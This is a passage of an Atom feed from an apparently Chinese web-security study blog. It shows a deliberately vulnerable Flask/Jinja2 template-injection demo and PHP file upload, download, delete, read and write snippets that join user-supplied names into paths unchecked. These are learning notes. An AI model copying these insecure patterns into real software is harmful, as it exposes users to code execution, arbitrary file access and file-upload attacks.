class="line"><span style="color: #BABED8">name </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> request</span><span style="color: #89DDFF">.</span><span style="color: #F07178">args</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">get</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">guest</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #BABED8">t </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">Template</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Hello </span><span style="color: #89DDFF">"</span><span style="color: #82AAFF"> </span><span style="color: #89DDFF">+</span><span style="color: #82AAFF"> name</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> t</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">render</span><span style="color: #89DDFF">()</span></span></code></pre></div><ul><li><p>正常情况下, 渲染后name应该直接被输出</p><p><img src="https://i0.imgs.ovh/2024/03/04/Oji9R.png" alt="Oji9R.png"></p></li><li><p>但如果用双大括号<code>{{}}</code>包裹参数值, 会被作为python代码执行</p><p><img src="https://i0.imgs.ovh/2024/03/04/OjUcN.png" alt="OjUcN.png"></p></li></ul></li><li><p>ctf案例:</p><ul><li><p><a href="https://buuoj.cn/challenges#[WesternCTF2018]shrine">BUUCTF在线评测 (buuoj.cn)</a></p></li><li><p><a href="https://blog.csdn.net/tscaxx/article/details/114483743">python学习笔记——flask之渲染模板(Jinja2)-特殊变量和方法_jinja2 flash-CSDN博客</a></p></li></ul></li></ul>]]></content>
<summary type="html"><h3 id="ASP安全"><a href="#ASP安全" class="headerlink" title="ASP安全"></a>ASP安全</h3><ul>
<li>常用组合: windows+IIS+ASP+Access(sql server)</li>
</ul>
</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="小迪安全" scheme="https://myprefer.github.io/tags/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"/>
<category term="WEB攻防" scheme="https://myprefer.github.io/tags/WEB%E6%94%BB%E9%98%B2/"/>
</entry>
<entry>
<title>PHP开发</title>
<link href="https://myprefer.github.io/post/PHP%E5%BC%80%E5%8F%91.html"/>
<id>https://myprefer.github.io/post/PHP%E5%BC%80%E5%8F%91.html</id>
<published>2024-02-28T10:59:34.000Z</published>
<updated>2024-03-03T15:03:56.772Z</updated>
<content type="html"><![CDATA[<h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h3><h4 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><</span><span style="color: #BABED8">form action</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">""</span><span style="color: #BABED8"> method</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">post</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> enctype</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">multipart/form-data</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">input type</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">text</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> name</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">username</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">input type</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">file</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> name</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">upload</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> multiple</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">multiple</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">input type</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">submit</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> value</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">提交</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"></</span><span style="color: #BABED8">form</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">name </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">upload</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">][</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">tmp_name </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">upload</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">][</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmp_name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(!</span><span style="color: #82AAFF">move_uploaded_file</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">tmp_name</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">name</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D"><br>文件上传失败!<br></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><h4 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>文件下载</h4><h5 id="直连下载"><a href="#直连下载" class="headerlink" title="直连下载"></a>直连下载</h5><p>只能下载exe, zip, 等等符合协议的文件类型, 稍微更安全</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">get_url_download</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">url </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">http://</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_HOST</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">files</span><span style="color: #89DDFF">/'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">location:</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><h5 id="传参下载"><a href="#传参下载" class="headerlink" title="传参下载"></a>传参下载</h5><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">get_down</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filedir </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(!</span><span style="color: #82AAFF">file_exists</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filedir</span><span style="color: #89DDFF">.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP/1.1 404 NOT FOUND</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filedir</span><span style="color: #89DDFF">.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">rb</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">Header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Content-type: application/octet-stream</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">Header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Accept-Ranges: bytes</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">Header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Accept-Length: </span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filedir </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">Header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Content-Disposition: attachment; filename=</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">);</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fread</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filedir</span><span style="color: #89DDFF">.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">exit</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><h4 id="文件删除"><a href="#文件删除" class="headerlink" title="文件删除"></a>文件删除</h4><h5 id="文件删除-1"><a href="#文件删除-1" class="headerlink" title="文件删除"></a>文件删除</h5><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">file_path </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">file_exists</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file_path</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">unlink</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file_path</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">文件删除成功</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">文件不存在</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h5 id="文件夹删除"><a href="#文件夹删除" class="headerlink" title="文件夹删除"></a>文件夹删除</h5><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">dir_path </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">dirname</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">is_dir</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">dir_path</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">rmdir</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">dir_path</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">目录删除成功</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">目录不存在</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h4 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">filepath </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">r</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">or</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">die</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">无法打开文件!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D"><h4>文件内容:</h4></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fread</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="文件写入"><a href="#文件写入" class="headerlink" title="文件写入"></a>文件写入</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">filepath </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">a+</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">or</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">die</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">无法打开文件!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">fwrite</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">txt</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="文件-目录列表读取"><a href="#文件-目录列表读取" class="headerlink" title="文件/目录列表读取"></a>文件/目录列表读取</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">dir </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getcwd</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #676E95; font-style: italic">// $dir = __DIR__;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">scandir</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">dir</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">/files</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">foreach</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">as</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">value</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">value </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">.</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">value </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">..</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">value </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"><br></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h3 id="信息获取"><a href="#信息获取" class="headerlink" title="信息获取"></a>信息获取</h3><h4 id="获取用户IP"><a href="#获取用户IP" class="headerlink" title="获取用户IP"></a>获取用户IP</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">])</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">])</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">])</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span><span 